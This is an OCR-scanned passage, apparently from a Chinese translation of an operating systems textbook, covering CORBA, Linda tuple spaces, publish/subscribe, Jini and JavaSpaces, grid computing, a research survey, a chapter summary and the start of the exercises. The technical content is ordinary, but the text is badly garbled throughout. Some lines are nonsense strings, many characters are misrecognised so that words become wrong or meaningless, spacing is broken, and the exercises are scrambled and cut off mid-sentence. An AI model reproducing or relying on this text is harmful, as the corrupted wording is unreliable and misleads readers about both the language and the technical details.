信 细 节 都 隐藏 起 来 。 特 别 地 ， 客 户 机 的 ORB 隐 藏 了 服务 器 的 位 置 、 服 
务 器 是 二 进 制 代码 还 是 脚本 、 服 务 器 在 什么 硬件 和 操作 系统 上 运行 、 
有 关 对 象 当 前 是 否 是 活动 的 以 及 两 个 ORB 是 如 何 通 信 的 (例如 ， 
TCP/IP、RPC、 共 享 内 存 等 ) 。 


TE —hRCORBA#, (CA LEB HLORBANARA a2ORB Z [A] AT 
议 。 结 果 导 致 每 一 个 ORB 的 销售 商都 使 用 不 同 的 协议 ， 其 中 的 任何 两 
个 协议 之 间 都 不 能 彼此 通信 。 在 2.0 版 中 ， 规 定 了 协议 。 对 于 用 在 
Internet 上 的 通信 ， 协 议 称 为 IOP (Internet InterOrb Protocol) 。 


为 了 能 够 在 CORBA 系 统 中 使 用 那些 不 是 为 CORBA 编 写 的 对 象 
可 以 为 每 个 对 象 装备 一 个 对 象 适配器 (object adapter) 。 对 象 适 配器 是 
一 种 包装 器 ， 它 处 理 诸如 登记 对 象 、 生 成 对 象 引 用 以 及 激发 一 个 在 被 
调用 时 处 于 未 活动 状态 的 对 象 等 琐碎 事务 。 所 有 这 些 与 CORBA 有 关 部 
分 的 布局 如 图 8-39 所 示 。 
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图 8-39 基于 CORBA 的 分 布 式 系统 中 的 主要 元 素 (CORBA 部 件 由 灰 
色 表 示 ) 


网 络 


对 于 CORBA 而 言 ， 一 个 严重 问题 是 每 个 CORBA 对 象 只 存在 一 个 
服务 器 上 ， 这 意味 着 那些 在 世界 各 地 客户 机 上 被 大 量 使 用 的 对 象 ， 会 


有 很 差 的 性 能 。 在 实践 中 ，CORBA 只 在 小 规模 系统 中 才能 有 效 工作 ， 
比如 ， 在 一 侣 计算机、 一 个 局 域 网 或 者 一 个 公司 中 用 来 连接 进程 。 


8.4.6 ”基于 协作 的 中 间 件 


TATA SN BS Te ce AT ee FEY Td 
(coordination-based middleware) 。 我 们 将 从 Linda 系 统 开始 ， 这 是 一 
个 开局 了 该 领域 的 学 术 性 研究 项 目 。 然 后 考察 主要 由 该 项 目 所 激发 的 
两 个 商业 案例 : pubilsh/subscribe 以 及 Jini。 


1.Linda 


Linda 是 一 个 由 耶鲁 大 学 的 David Gelernter 和 他 的 学 生 Nick Carriero 
(Carriero 与 Gelernter，1986; Carriero 与 Gelernter，1985) 研发 的 用 于 
通信 和 同步 的 新 系统 。 在 Linda 系 统 中 ， 相 互 独立 的 进程 之 间 通 过 一 个 
抽象 的 元 组 空间 (tuple space) 进行 通信 。 对 整个 系统 而 言 ， 元 组 空间 
是 全 局 性 的 ， 在 任何 机 器 上 的 进程 都 可 以 把 元 组 插入 或 移出 元 组 空 
间 ， 而 不 用 考虑 它们 是 如 何 存放 的 以 及 存放 在 何 处 。 对 于 用 户 而 言 ， 
元 组 空间 像 一 个 巨大 的 全 局 共享 存储 器 ， 如 同 我 们 前 面 已 经 看 到 的 
( 见 图 8-21c) 各 种 类 似 的 形式 。 


一 个 元 组 类 似 于 C 语 言 或 者 Java 中 的 结构 。 它 包括 一 个 或 多 个 域 ， 
每 个 域 是 一 个 由 基 语 言 (base language) (通过 在 已 有 的 语言 ， 如 C 语 
言 中 添加 一 个 库 ， 可 以 实现 Linda) 所 支持 的 某 种 类 型 的 值 。 对 于 C- 
Linda， 域 的 类 型 包括 整数 、 长 整数 、 浮 点 数 以 及 诸如 数组 (包括 字符 


串 ) 和 结构 (hehe A AACA) 之 类 的 组 合 类 型 。 与 对 象 不 
同 ， 元 组 是 纯粹 的 数据 ; 它们 没有 任何 相关 联 的 方法 。 在 图 8-40 中 给 出 
了 三 个 元 组 的 示例 。 


("abc", 2, 5) 
("matrix-1", 1, 6, 3.14) 


("family", “is-sister", "Stephany", “Roberta") 


图 8-40 三 个 Linda 的 元 组 


在 元 组 上 存在 四 种 操作 。 第 一 种 out， 将 一 个 元 组 放 入 元 组 空间 
中 。 例 如 


out("abc",2,5); 


该 操作 将 元 组 ("abc",2,5) 放 入 到 元 组 空间 中 。out 的 域 通常 是 常数 、 
变量 或 者 是 表达 式 ， 例 如 


out("matrix-1",i,j,3.14); 


输出 一 个 市 有 四 个 域 的 元 组 ， 其 中 的 第 二 个 域 和 第 三 个 域 由 变量 i 
和 j 的 当前 值 所 决定 。 


通过 使 用 ip 原 语 可 以 从 元 组 空间 中 获取 元 组 。 该 原 语 通过 内 容 而 不 
是 名 称 或 者 地 址 寻找 元 组 。in 的 域 可 以 是 表达 式 或 者 形式 参数 。 例 如 ， 


考虑 


in("abc",2,?1); 


这 个 操作 在 元 组 空间 中 “得 询 ” 包 含 字 符 串 “abc”、 整数 2 以 及 在 第 三 
个 域 中 含有 任意 整数 (假设 i 是 整数 ) 的 元 组 。 如 果 发 现 了 ， 则 将 该 元 
组 从 元 组 空间 中 移出 ， 并 且 把 第 三 个 域 的 值 赋予 变量 i。 这 种 匹配 和 移 
出 操作 是 原子 性 的 ， 所 以 ， 如 果 两 个 进程 同时 执行 in 操 作 ， 只 有 其 中 一 
个 会 成 功 ， 除 非 存在 两 个 或 更 多 的 匹配 元 组 。 在 元 组 空间 中 甚至 可 以 
有 同一 个 元 组 的 多 个 副本 存在 。 


in 采 用 的 匹配 算法 是 很 直接 的 。in 原 语 的 域 ， 称 为 模板 
(template) ， (在 概念 上 ) 它 与 元 组 空间 中 的 每 个 元 组 的 同一 个 域 相 
比较 ， 如 采 下 面 的 三 个 条 件 都 符合， 那么 产生 出 一 个 匹配 : 


1) 模 板 和 元 组 有 相同 数量 的 域 。 


2) 对 应 域 的 类 型 一 样 。 


3) 模 板 中 的 每 个 营 数 或 者 变量 均 与 该 元 组 域 相 匹 配 。 


形式 参数 ， 由 问号 标识 后 面 跟 随 一 个 变量 名 或 类 型 所 给 是 ， 并 不 
参与 匹配 (除了 类 型 检查 例外 ) ， 尽 管 在 成 功 匹 配 之 后 ， 那 些 含 有 一 
个 变量 名 称 的 形式 参数 会 家 赋值 。 


如 有 条 没 有 匹配 的 元 组 存在 ， 调 用 进程 便 被 挂 起 ， 直 到 另 一 个 进程 
插入 了 所 需要 的 元 组 为 止 ， 此 时 该 调用 进程 目 动 复活 并 获得 新 的 元 
组 。 进 程 阻 塞 和 目 动 解除 阻塞 意味 着 ， 如 有 果 一 个 进程 与 输出 一 个 元 组 
有 关 而 男 一 个 进程 与 输入 一 个 元 组 有 天， 那么 谁 在 先是 无 天 紧要 的 。 
惟一 的 差别 是 ， 如 果 in 在 out 之 前 被 调用 了 ， 那 么 会 有 少许 的 延 时 存 
在 ， 直 到 得 到 元 组 为 止 。 


在 某 个 进程 需要 一 个 不 存在 的 元 组 时 ， 阻 塞 该 进程 的 方式 可 以 有 
许多 用 途 。 例 如 ， 该 方式 可 以 用 于 信号 量 的 实现 。 为 了 要 建立 信和 号 量 S 
或 在 信号 量 S 上 执行 一 个 up 操作 ， 进 程 可 以 执行 如 下 操作 


out( "semaphore S"); 


要 执行 一 个 down 操 作 ， 可 以 进行 


in("semaphore S"); 


在 元 组 空间 中 ("semaphore S") 元 组 的 数量 决定 了 信号 量 $ 的 状 
态 。 如 采信 号 量 不 存在 ， 任 何 要 获得 信号 量 的 企图 都 会 被 阻 军 ， 直 到 
某 些 其 他 的 进程 提供 一 个 为 止 。 


除了 out 和 in 操 作 ，Linda 还 提供 了 原 语 read， 它 和 in 是 一 样 的 ， 不 
过 它 不 把 元 组 移出 元 组 空间 。 还 有 一 个 原 语 eval， 它 的 作用 是 同时 对 元 
组 的 参数 进行 计算 ， 计算 后 的 元 组 会 被 放 进 元 组 空间 中 去 。 可 以 利用 


这 个 机 制 完 成 一 个 任意 的 运算 。 以 上 内 容 说 明了 怎样 在 Linda 中 创建 并 
行 的 进程 。 


2. 发 布 /订阅 (Pubilsh/Subscribe) 


由 于 受到 Linda 的 局 发 ， 出 现 了 基于 协作 的 模型 的 一 个 例子 ， 称 作 
pubilsh/subscribe (Oki 等 人 ，1993) 。 它 由 大 量 通 过 广播 网 网 络 互 联 的 
进程 组 成 。 每 个 进程 可 以 是 一 个 信息 生产 者 、 信 息 消费 者 或 两 者 都 


是 。 


当 一 个 信息 生产 者 有 了 一 条 新 的 信息 (例如 ， 一 个 新 的 股票 价 
格 ) 后 ， 它 就 把 该 信息 作为 一 个 元 组 在 网 络 上 广播 。 这 种 行为 称 为 发 
布 (publishing) 。 在 每 个 元 组 中 有 一 个 分 层 的 主题 行 ， 其 中 有 多 个 用 
圆 点 (ESCA SS) 分 隔 的 域 。 对 特定 信息 感 兴趣 的 进程 可 以 订阅 
(subscribe) 特定 的 专题 ， 这 包括 在 主题 行 中 使 用 通配符 。 在 同一 台 机 
上 上， 只 要 通知 一 个 元 组 守护 进程 束 可 以 完成 订阅 工作 ， 该 守护 进程 
监测 已 出 版 的 元 组 并 查找 所 需要 的 专题 。 


发 布 /订阅 的 实现 过 程 如 图 8-41 所 示 。 当 一 个 进程 需要 发 布 一 个 元 
组 时 ， 它 在 本 地 局 域 网 上 三 播 。 在 每 台 机 右上 的 元 组 守护 进程 则 把 所 
有 的 已 广播 的 元 组 复制 进入 其 RAM。 然 后 检查 主题 行 看 看 哪些 进程 对 
它 感 兴趣 ， 并 给 每 个 感 兴趣 的 进程 发 送 一 个 该 元 组 的 副本 。 元 组 也 可 
以 在 广域网 上 或 nternet 上 进行 广播 ， 这 种 做 法 可 以 通过 将 每 个 局 域 网 
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送 到 其 他 的 局 域 网 上 再 次 广播 的 方法 来 实现 。 这 种 转送 方法 也 可 以 进 
行 得 更 为 聪明 ， 即 只 把 元 组 转送 给 至 少 有 一 个 需要 该 元 组 的 订阅 者 的 
远程 局 域 网 。 不 过 要 做 到 这 一 点 ， 需 要 使 用 信息 路 由 器 交换 有 关 订 阅 
者 的 信息 。 


消费 者 "i 守护 进程 
信息 路 由 器 


图 8-41 发 布 /订阅 的 体系 结构 


这 里 可 以 实现 各 种 语义 ， 包 括 可 靠 发 送 以 及 保证 发 送 ， 即 使 出 现 
裔 涡 也 没有 关系 。 在 后 一 种 情形 下 ， 有 必要 存储 原 有 的 元 组 供 以 后 需 
要 时 使 用 。 一 种 存储 的 方法 是 将 一 个 数据 库 系统 和 该 系统 挂钩 ， 并 让 
该 数据 库 订 阅 所 有 的 元 组 。 这 可 以 通过 把 数据 库 封 状 在 一 个 适 配 套 中 
实现 ， 从 而 允许 一 个 已 有 的 数据 库 以 发 布 /订阅 模型 工作 。 当 元 组 们 经 
过 时 ， 适 配 帮 束 一 一 抓 取 它 们 并 把 它们 放 进 数据 库 中 。 


发 布 /订阅 模型 完全 把 生产 者 和 消费 着 分 隅 开 来 ， 如 同 在 Linda 中 一 
样 。 但 是 ， 有 的 时 候 还 是 有 必要 知道 ， 男 外 还 有 谁 对 某 种 信息 感 兴 


趣 。 这 种 信息 可 以 用 如 下 的 方法 来 收集 : 发 布 一 个 元 组 ， 它 只 询 
[A]: “ 谁 对 信息 x 有 兴趣 ? ”。 以 元 组 形式 的 啊 应 会 是 : “我 对 x 有 兴趣 。” 


3.Jini 


50 多 年 来 ， 计 算 始 终 是 以 CPU 为 中 心 的 ， 一 台 计 算 机 就 是 一 个 独 
立 的 装置 ， 包 括 一 个 CPU、 一 些 基本 存储 器 、 并 总 是 有 诸如 硬盘 等 这 
样 一 些 大 容量 的 存储 器 。Sun 公 司 的 Jini (基因 拼写 的 变形 ) 则 是 企图 
改变 这 种 计算 模型 的 一 个 尝试， 这 种 模型 可 以 描述 为 以 网 络 为 中 心 
(Waldo, 1999) ° 


在 Jini 世 界 中 有 大 量 自 包 含 的 Jini 设 备 ， 其 中 的 每 一 个 设备 都 为 其 
他 的 设备 提供 了 一 种 或 多 种 服务 。 可 以 把 Jini 设 备 插 入 到 网 络 中 ， 并 且 
立即 开始 提供 和 使 用 服务 ， 这 并 不 需要 复杂 的 安装 过 程 。 请 注意 ， 这 
些 设备 是 被 插入 到 网 络 中 ， 而 不 是 如 同 传统 那样 插入 到 计算 机 中 。 一 
个 Jini 设 备 可 以 是 一 台 传 统 的 计算 机 ， 但 也 可 以 是 一 台 打 印 机 、 税 上 电 
脑 、 蜂 离 电话 、 电 视 机 、 立 体 音 啊 或 其 他 融 有 CPU、 一些 存储 器 以 及 
一 个 (可 能 是 无 线 ) 网 络 连接 的 设备 。Jini 系 统 是 Jini 设 备 的 一 个 松散 
联邦 ，Jini 设 备 可 以 依照 自己 的 意愿 进入 和 离开 该 联邦 ， 不 存在 集权 式 
的 管理 。 


当 一 个 Jini 设 备 想 加 入 Jini 联 邦 时 ， 它 在 本 地 局 域 网 上 广播 一 个 
包 ， 或 者 在 本 地 无 线 蜂 二 网 上 询问 是 否 存 在 查询 服务 (lookup 


service) 。 用 于 寻找 查询 服务 的 协议 是 发 现 协议 (discovery protocol) 
以 及 若干 Jini 硬 线 协议 中 的 某 一 个 。 ( 男 一 种 寻找 方法 是 ， 新 的 Jini 设 
备 可 以 等 待 直到 有 一 个 周期 性 的 查询 服务 公告 经 过 ， 但 是 我 们 不 会 在 
这 里 讨论 这 种 机 制 ) 。 


当 查 询 服务 看 到 有 一 个 新 的 设备 想 注 册 时 ， 它 用 一 段 可 以 用 来 完 
成 注册 的 代码 作为 回答 。 由 于 Jini 是 纯 的 Java 系 统 ， 被 发 送 的 代码 是 
JVM (Java 虚 拟 机 语言 ) 形式 的 ， 所 有 的 Jini 设 备 必 定 能 运行 它 ， 通 稼 
征 以 解释 方式 运行 。 接 着 ， 痢 设备 运行 该 代码 ， 代 码 同 查询 服务 联系 
并 且 在 某 个 固定 的 时 间 段 中 进行 注册 。 在 该 时 间 段 失效 之 前 ， 如 采 有 
意愿 ， 该 设备 就 可 以 注册 。 这 一 机 制 意味 着 ， 一 个 Jini 设 备 可 以 通过 关 
机 的 方式 离开 系统 ， 有 关 该 设备 的 曾经 存在 的 状态 很 快 束 会 被 遗 瑟 
掉 ， 不 需要 任何 集中 性 的 管理 。 注 册 一 定 的 时 间 间 隔 的 做 法 ， 称 为 取 
得 一 项 租约 (lease) 。 


请 注意 ， 由 于 用 于 注册 设备 的 代码 是 通过 下 载 进 入 设备 的 ， 因 此 
注册 用 的 代码 会 随 着 系统 演化 而 被 修改 抒 ， 不 过 系统 的 演进 并 不 会 影 
啊 设 备 的 硬件 和 软件 。 事 实 上 ， 设 备 甚 至 不 用 明白 什么 是 注册 协议 。 
设备 所 需 明日 的 只 是 整个 注册 过 程 中 的 一 段 ， 即 注册 的 设备 提供 的 一 
些 属 性 和 代理 代码 ， 这 样 其 他 设备 稍 后 将 会 使 用 这 些 属 性 和 代理 代 
码 ， 以 便 访 问 该 设备 。 
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的 一 个 特定 服务 存在 。 在 该 请 求 中 可 以 包含 设备 在 注册 时 使 用 的 属 
性 。 如 果 请 求 成 功 ， 在 该 设备 注册 时 所 提供 的 代理 就 会 被 送 回 给 请 求 
者 ， 并 且 加 以 运行 以 联络 有 头 设备 。 这 样 ， 设 备 或 用 户 束 可 以 同 其 他 
的 设备 对 话 ， 而 无 须知 道 对 方 在 哪里 ， 其 至 也 无 须知 道 对 话 所 用 的 协 
议定 何 种 协议 。 


Jini 客 户 机 和 服务 (硬件 或 软件 设备 ， 使 用 JavaSpace 进 行 通信 和 同 
步 ， 这 方式 实际 是 模仿 Linda 的 元 组 空间 ， 但 存在 一 些 重 要 的 差别 。 每 
个 JavaSpace 由 一 些 强 类 型 的 记录 项 组 成 。 这 些 记 孙 项 与 Linda 的 元 组 类 
似 ， 不 过 它们 是 强 类 型 的 ， 而 Linda 的 元 组 则 是 无 类 型 的 。 在 每 个 记录 
项 中 包含 一 些 域 ， 每 个 域 中 有 一 个 基本 Java 类 型 。 例 如 ， 一 个 雇员 类 型 
的 记录 项 可 以 包括 一 个 字符 串 (用 于 姓名 ) 、 一 个 整数 (用 于 部 
D 、 第 二 个 整数 (用 于 电话 分 机 号 ) 以 及 一 个 布尔 值 (用 于 全 时 工 
作 ) 。 


在 JavaSpace 中 只 定义 了 四 个 方法 (尽管 其 中 的 两 个 方法 还 有 一 个 
变种 ) : 


1)Write: 把 一 个 记录 项 放 入 JavaSpace 。 
2)Read: 将 一 个 与 模板 匹配 的 记录 项 复制 出 JavaSpace ° 


3)Take: 复制 并 移 走 一 个 与 模板 匹配 的 记录 项 。 


A)Notify: 当 一 个 匹配 的 记录 项 写 入 时 通知 调用 者 。 


write 方 法 提供 记录 项 并 确定 其 租约 时 间 ， 即 何 时 应 该 丢弃 该 记录 
项 。 相 反 ，Linda 的 元 组 则 一 直 停 留 着 直到 被 移出 为 止 。 在 JavaSpace 中 
可 以 保存 有 同一 个 记录 项 的 多 个 副本 ， 所 以 它 不 是 一 个 数学 意义 上 的 
集合 (如 同 Linda 那 样 ) 。 


read 和 take 方 法 为 要 寻找 的 记 杂 项 提供 了 一 个 模板 。 在 该 模板 的 每 
个 域 中 有 一 个 必须 匹配 的 特定 值 ， 或 者 可 以 包含 一 个 “不 在 乎 ”的 通 配 
符 ， 该 通配符 可 以 匹配 所 有 合适 的 类 型 的 值 。 如 果 发 现 一 个 匹配 ， 则 
返回 该 记录 项 ， 而 在 take 的 情形 下 ， 该 记录 项 还 被 移出 了 JavaSpace 空 
间 。 这 些 JavaSpace 方 法 中 的 每 一 个 部 有 两 个 变种 ， 在 没有 匹配 到 记录 
项 时 ， 它 们 之 间 有 所 有 差别。 其 中 一 个 变种 即刻 返回 一 个 失败 的 标识 。 
而 男 一 个 则 一 直 等 到 时 间 段 〈 作 为 一 个 参数 给 定 ) 到 期 为 止 。 


notify 方 法 用 一 个 特殊 模板 注册 兴趣 。 如 采 以 后 进来 了 一 个 相 匹配 
的 记录 项 ， 融 调用 调用 着 的 notify 方 法 。 


与 Linda 中 的 元 组 空间 不 同 ，JavaSpace 支 持原 子 事 务 处 理 。 通 过 使 
用 原子 事务 处 理 ， 可 以 把 多 个 方法 聚集 在 一 起 。 它 们 要 么 全 部 都 执 
行 ， 要 么 全 部 都 不 执行 。 在 该 事务 处 理 期 间 ， 在 该 事务 处 理 之 外 对 
JavaSpace 的 修改 是 不 可 见 的 。 只 有 在 该 事务 处 理 结束 之 后 ， 它 们 才 对 
其 他 的 调用 者 可 见 。 


可 以 在 通信 进程 之 间 的 同步 中 运用 JavaSpace。 例 如 ， 在 生产 者 - 消 
费 者 的 情形 下 ， 生 产 者 在 产品 生产 出 来 之 后 可 以 把 产品 放 进 JavaSpace 
中 。 消 费 痢 使 用 take 取 走 这 些 产 品 ， 如 末 产 品 没 有 了 束 阻 窄 。JavaSpace 
保证 每 个 方法 的 执行 都 是 原子 性 的 ， 所 以 不 会 出 现 当 一 个 进程 试图 读 
出 一 个 记录 项 时 ， 该 记录 项 仅仅 完成 了 一 半 进 入 的 危险 。 


8.4.7 网 格 


如 有 果 没 有 谈 及 最 新 的 发 展 ， 即 在 未 来 有 可 能 变 得 非常 重要 的 网 

格 ， 那 么 ， 对 于 分 布 式 系 统 的 论述 将 是 不 完整 的 。 所 谓 网 格 

(grid) ， 是 一 个 大 的 、 地 理 上 分 散 的、 通常 是 由 私有 网 络 或 因特网 
连接 起 来 的 异 构 机 大 的 集合 ， 辐 用 户 提供 一 系列 服务 。 有 时 候 网 格 也 
被 比 作 虚拟 超级 计算 机 ， 但 其 实 还 不 只 是 这 样 。 它 是 很 多 独立 计算 机 
的 集合 ， 一 般 位 于 多 个 管理 域 中 ， 所 有 的 这 些 管理 域 都 会 运行 中 间 件 
的 一 个 公共 的 中 间 件 层 以 便 用 户 和 程序 可 以 通过 方便 和 一 致 的 方式 访 
问 所 有 资源 。 


构建 网 格 的 初始 动机 是 为 了 CPU 的 时 钟 周期 共享 。 当 时 的 想法 
是 : 当 一 个 机 构 不 需要 它 的 全 部 的 计算 能 力 时 (例如 在 夜间 ) ， 男 一 
个 机 构 〈 可 能 相隔 好 几 个 时 区 ) 束 可 以 利用 这 些 时 钟 周期 ， 并 且 12 小 
时 之 后 也 对 外 提供 这 样 的 帮助 。 现 在 ， 网 格 研 究 人 员 也 在 关注 其 他 资 
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典型 地 ， 网 格 的 工作 原理 是 : 在 每 个 参与 的 机 融 中 运行 一 组 管理 
机 器 并 且 把 它 加 入 到 网 格 中 的 程序 。 这 个 程序 通常 需要 处理 认证 及 远 
程 用 户 登 录 、 资 源 发 布 及 发 现 、 作 业 调 度 及 分 配 等 。 当 某 个 用 户 有 工 
作 需 要 计算 机 来 做 时 ， 网 格 软 件 决定 哪里 有 空闲 的 人 硬件、 软件 和 数据 


资源 来 完成 这 项 工作 ， 然 后 将 作业 搬运 过 去 ， 安 排 执 行 并 收集 计算 结 
果 返 回 给 用 户 。 


在 网 格 世界 中 ， 一 个 流行 的 中 间 件 叫 Globus Toolkit， 它 在 很 多 平 
台 上 都 是 可 用 的 并 且 文 持 很 多 (即将 出 现 的 ) 网 格 标准 (Foster, 
2005) 。Globus 通 过 灵活 和 安全 的 方式 提供 一 个 供用 户 共享 计算 机 、 
文件 以 及 其 他 资源 的 平台 ， 同 时 又 不 会 牺牲 本 地 的 自治 性 。 网 格 正在 
成 为 很 多 分 布 式 应 用 的 构建 基础 。 


8.5 ” 有关 多 处 理 机 系统 的 研究 


在 本 草 中 ， 我 们 考察 了 四 类 多 处 理 絮 系统 ， 多 处 理 紫 、 多 计算 
机 、 虚拟 机 和 分 布 式 系统 。 下 面 简要 地 介绍 在 这 些 领域 中 的 有 关 人 研 冤 
工作 。 


在 多 处 理 器 领域 中 的 多 数 研 究 与 硬件 有 关 ， 特 别 是 与 如 何 构建 共 
享 存储 器 和 保持 其 一 致 性 (如 Higham 等 人 ，2007) 有 关 。 然 而 ， 还 有 
一 些 关 于 多 处 理 咒 的 其 他 研究 ， 特 别 是 片上 多 处 理 器 ， 包 括 编程 模型 
和 随 之 带 来 的 操作 系统 问题 (Fedorova 等 人 ，2005; Tan 等 人 ， 
2007) 、 通 信 机 制 (Brisolara A, 2007) 、 软 件 的 能 源 管理 (Park 
人 ，2007) 、 安 全 (Yang 和 Peng，2006) 还 有 未 来 的 挑战 (Wolf, 
2004) 。 另 外 ， 对 调度 的 研究 也 总 是 很 流行 (Chen 等 人 ，2007; Lin 和 
Rajaraman，2007; Rajagopalan 等 人 ，2007; Tam 等 人 ，2007; Yahav 
等 人 ，2007) 


多 计算 机 比 多 处 理 喜 更 容易 构建 。 所 需要 的 只 是 一 批 PC 机 或 工作 
站 ， 以 及 一 个 高 速 网 络 。 由 于 这 个 原因 ， 在 大 学 中 多 计算 机 是 一 个 热 
门 的 研究 课题 。 有 许多 工作 与 这 样 或 那样 的 分 布 式 共 至 存储 全 有 天 ， 
有 些 是 基于 页 面 的 ， 有 些 是 在 整个 软件 中 的 (Byung-Hyun 等 人 ， 
2004; Chapman 和 Heiser，2005; Huang 等 人 ，2001; Kontothanassis 等 


人 ，2005; Nikolopoulos 等 人 ，2001; Zhang 等 人 ，2006) 。 编 程 模 型 


也 正在 被 研究 (Dean#iiGhemawat, 2004) 。 当 规模 达到 好 几 万 个 CPU 
的 时 候 ， 数 据 中 心 的 能 源 使 用 也 是 一 个 问题 (Bash 和 Forman，2007; 
Ganesh 等 人 ，2007; Villa, 2006) 。 


虚拟 机 是 一 个 特别 热门 的 话题 ， 针 对 不 同 的 方面 有 许多 论文 ， 包 
括 能 源 管 理 (Moore 等 人 ，2005; Stoess 等 人 ，2007) 、 内 存 管理 (Lu 
和 Shen，2007) 和 信任 管理 (Garfinkel A, 2003; Lei 等 人 ， 

2003) 。 安 全 也 是 一 个 方面 (Jaeger 等 人 ，2007) 。 人 性 能 优化 也 是 一 
个 很 有 意思 的 问题 ， 特 别 是 CPU 的 性 能 (King A, 2003) 、 网 络 性 
能 (Menon 等 人 ，2006) 、1/O 性 能 (Cherkasova 和 Gardner，2005; 
Liu 等 人 ，2006) ° 虚拟 机 使 得 迁移 变 得 可 行 ， 所 以 这 个 话题 也 引起 了 
关注 (Bradford 等 人 ，2007; Huang 等 人 ，2007) 。 虚 拟 机 也 已 经 被 用 
来 调试 操作 系统 (King 等 人 ，2005) 。 


随 着 分 布 式 计算 的 发 展 ， 已 经 有 很 多 关于 分 布 式 文件 及 存储 系统 
方面 的 研究 ， 遇 到 的 问题 包括 : 遭遇 软 硬 件 错误 、 人 为 错误 、 自 然 灾 
害 时 的 长 期 可 维护 性 (Baker 等 人 ，2006; Kotla 等 人 ，2007; Maniatis 
等 人 ，2005; Shah 等 人 ，2007; Storer 等 人 ，2007) 、 使 用 不 可 信 的 服 
务 器 (Adya 等 人 ，2002; Popescu 等 人 ，2003) 、 认 证 (Kaminsky 等 
人 ，2003) 和 分 布 式 文件 系统 的 可 扩展 性 (Ghemawat 等 人 ，2003; 
Saito, 2002; Weil 等 人 ，2006) 。 如 何 扩展 分 布 式 系统 也 已 经 被 研究 

(Peek 等 人 ，2007) 。 点 对 点 (P2P) 分 布 式 文件 系统 也 被 广泛 地 研 


究 (Dabek À, 2001; Gummadi A, 2003; MuthitacharoenS A , 
2002; Rowstron#lDruschel, 2001) 。 在 有 一 些 节点 可 以 移动 的 情况 
下 ， 能 源 有 效 利用 率 也 开始 变 得 很 重要 (Nightingale 和 Flinm， 

2004) ° 


8.6 小结 


采用 多 个 CPU 可 以 把 计算 机 系统 建造 得 更 快 更 可 靠 。CPU 的 四 种 
组 织 形式 钙 多 处 理 器 、 多 计算 机 、 虚 拟 机 和 分 布 式 系统 。 其 中 的 每 一 
种 都 有 其 目 己 的 特性 和 问题 。 


一 个 多 处 理 器 包括 两 个 或 多 个 CPU， 它 们 共享 一 个 公共 的 RAM 。 
这 些 CPU 可 以 通过 总 线 、 交 义 开关 或 一 个 多 级 交换 网 络 互 连 起 来 。 各 
种 操作 系统 的 配置 都 是 可 能 的 ， 包 括 给 每 个 CPU 配 一 个 各 目的 操作 系 
统 、 配 置 一 个 主 操 作 系统 而 其 他 征 从 属 的 操作 系统 或 者 是 一 个 对 称 多 
处 理 右 ， 在 每 个 CPU 上 都 可 运行 的 操作 系统 的 一 个 副本 。 在 后 一 种 情 
形 下 ， 需 要 用 锁 提 供 同步 。 当 没有 可 用 的 锁 时 ， 一 个 CPU 会 空转 或 者 
进行 上 下 文 切换 。 各 种 调度 算法 都 是 可 能 的 ， 包 括 分 时 、 空 间 分 割 以 
及 群 调度 。 


多 计算 机 也 有 两 个 或 更 多 的 CPU， 但 是 这 些 CPU 有 自己 的 私有 存 
储 器 。 它 们 没有 任何 公共 的 RAM， 所 以 全 部 的 通信 通过 消息 传递 完 
成 。 在 有 些 情 形 下 ， 网 络 接口 卡 有 目 己 的 CPU， 此 时 在 主 CPU 和 接口 
板 上 的 CPU 之 间 的 通信 必须 仔细 地 组 织 ， 以 避免 竞争 条 件 的 出 现 。 在 
多 计算 机 中 的 用 户 级 通信 和 常常 使 用 远程 过 程 调 用 ， 但 也 可 以 使 用 分 布 
式 共享 存储 器 。 这 里 进程 的 负载 平衡 是 一 个 问题 ， 有 多 种 算法 用 以 解 


决 该 问题 ， 包 括 发 送 者 -驱动 算法 、 接 收 者 -驱动 算法 以 及 竞标 算法 


ZE o 
于 


虚拟 机 人 允许 一 个 或 多 个 实际 的 CPU 提供 比 现 有 CPU 数量 更 多 的 假 
象 。 通 过 这 种 方式 ， 可 以 同时 在 同一 个 硬件 上 运行 多 种 操作 系统 ， 或 
者 同一 个 操作 系统 的 不 同 (不 兼容 ) 的 版 本 。 当 结合 了 多 核 的 设计 ， 
每 台 计 算 机 束 变 成 了 一 个 潜在 的 大 规模 多 计算 机 。 


分 布 式 系统 是 一 个 松散 耦合 的 系统 ， 其 中 每 个 节点 是 一 台 完 整 的 
计算 机 ， 配 有 全 部 的 外 部 设备 以 及 自己 的 操作 系统 。 这 些 系 统 常 常 分 
布 在 较 大 的 地 理 区 域内 。 在 操作 系统 上 通常 设计 有 中 间 件 ， 从 而 提供 
一 个 统一 的 层次 以 方便 与 应 用 程序 的 交互 。 中 间 件 的 类 型 包括 基于 文 
档 、 基 于 文件 、 基 于 对 象 以 及 基于 协调 的 中 间 件 。 有 关 的 一 些 例 子 有 
World Wide Web、CORBA、Linda 以 及 Jini ° 


习题 
1. 可 以 把 USENET 新 闻 组 系统 和 SETI@home 项 目 看 作 分 布 式 系统 
吗 ? (SETI@home 使 用 数 百 万 台 空 闪 的 个 人 计算 机 ， 用 来 分 析 无 线 电 
频谱 数据 以 搜寻 地 球 之 外 的 智慧 生物 ) 。 如 果 是 ， 它 们 属于 图 8-1 中 描 
述 的 哪些 类 ? 

2. 如 果 一 个 多 处 理 器 中 的 两 个 CPU 在 同一 时 刻 ， 试 图 访问 内 存 中 


同一 个 字 ， 会 发 生 什么 事情 ? 
3. 如 果 一 个 CPU 在 每 条 指令 中 都 发 出 一 个 内 存 访问 请 求 ， 而 且 计 


算 机 的 运行 速度 是 200MIPS， 那 么 多 少 个 CPU 会 使 一 个 400MHz 的 总 线 
饱和 ? 假设 对 内 存 的 访问 需要 一 个 总 线 周期 。 如 果 在 该 系统 中 使 用 组 


存 技 术 ， 且 缓存 命中 率 达 到 90%， 那 么 多 少 个 CPO 会 使 总 线 饱 和 ? 最 
后 ， 如 有 果 要 使 32 个 CPU 共 宇 该 总 线 而 且 不 使 其 过 载 ， 需 要 多 高 的 命中 


率 ? 
4. 在 图 8-5 的 omega 网 络 中 ， 假 设 在 交换 网 络 2A 和 交换 网 络 3B 之 间 
的 连 线 断 了 。 那 么 哪些 节点 之 间 的 联系 被 切断 了 ? 


号 是 如 何 处 理 的 ? 


5. 在 图 8-7 的 模型 中 ， 信 


6. 使 用 纯 read 重 写 图 2-22 中 的 enter_region 代 人 码 ， 用 以 减少 由 TSL 指 
ATS | HEA BRR 。 


7. 多 核 CPU 开 始 在 普通 的 桌面 机 和 笔记 本 电脑 上 出 现 ， 拥 有 数 十 
